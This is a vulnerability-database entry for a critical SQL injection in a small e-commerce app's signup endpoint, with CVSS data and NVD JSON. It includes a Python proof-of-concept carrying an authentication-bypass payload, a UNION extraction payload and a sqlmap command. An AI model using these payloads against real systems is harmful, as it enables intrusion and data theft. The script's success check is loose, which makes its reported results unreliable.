CVE-2025-61455

Description

SQL Injection vulnerability exists in Bhabishya-123 E-commerce 1.0, specifically within the signup.inc.php endpoint. The application directly incorporates unsanitized user inputs into SQL queries, allowing unauthenticated attackers to bypass authentication and gain full access.

CVSS Details

CVSS Score

9.8

Severity

CRITICAL

CVSS Vector

CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H

Configurations (Affected Products)

No configuration data available.

Bhabishya-123 E-commerce 1.0

PoC / Exploit Code

⚠ For Security Research Only

The following code is for security research and authorized testing only.

python

# CVE-2025-61455 PoC - SQL Injection in Bhabishya-123 E-commerce 1.0 # Vulnerability location: signup.inc.php # Exploit type: Authentication Bypass via SQL Injection import requests # Target configuration TARGET_URL = "http://target-site.com/signup.inc.php" # SQL Injection payload for authentication bypass # The payload injects into the username field to manipulate the SQL query payload = { "username": "admin' OR '1'='1' -- ", "password": "anything", "email": "[email protected]", "submit": "Sign Up" } # Send the malicious request response = requests.post(TARGET_URL, data=payload) # Check if the injection was successful if "success" in response.text.lower() or response.status_code == 200: print("[+] SQL Injection successful! Authentication bypassed.") else: print("[-] Injection attempt failed, try adjusting the payload.") # Alternative payload for data extraction via UNION-based SQLi # Use sqlmap for automated exploitation: # sqlmap -u "http://target-site.com/signup.inc.php" --data="username=admin&password=test&[email protected]" -p username --dbs # Another payload for extracting database version extraction_payload = { "username": "' UNION SELECT 1,version(),database(),4 -- ", "password": "test", "email": "[email protected]" } response2 = requests.post(TARGET_URL, data=extraction_payload) print(f"[*] Database info extraction response: {response2.text[:200]}")

References

[1] CVE.org https://www.cve.org/CVERecord?id=CVE-2025-61455
[2] NVD NIST https://nvd.nist.gov/vuln/detail/CVE-2025-61455
[3] CVE Details https://www.cvedetails.com/cve/CVE-2025-61455/
[4] VulDB https://vuldb.com/cve/CVE-2025-61455
[5] https://github.com/tansique-17/CVE-2025-61455

Raw JSON Data

JSON

{"cve": {"id": "CVE-2025-61455", "sourceIdentifier": "[email protected]", "published": "2025-10-20T14:15:41.170", "lastModified": "2026-04-15T00:35:42.020", "vulnStatus": "Deferred", "cveTags": [], "descriptions": [{"lang": "en", "value": "SQL Injection vulnerability exists in Bhabishya-123 E-commerce 1.0, specifically within the signup.inc.php endpoint. The application directly incorporates unsanitized user inputs into SQL queries, allowing unauthenticated attackers to bypass authentication and gain full access."}], "metrics": {"cvssMetricV31": [{"source": "134c704f-9b21-4f2e-91b3-4a467353bcc0", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "baseScore": 9.8, "baseSeverity": "CRITICAL", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "NONE", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "HIGH", "integrityImpact": "HIGH", "availabilityImpact": "HIGH"}, "exploitabilityScore": 3.9, "impactScore": 5.9}]}, "weaknesses": [{"source": "134c704f-9b21-4f2e-91b3-4a467353bcc0", "type": "Secondary", "description": [{"lang": "en", "value": "CWE-89"}]}], "references": [{"url": "https://github.com/tansique-17/CVE-2025-61455", "source": "[email protected]"}]}}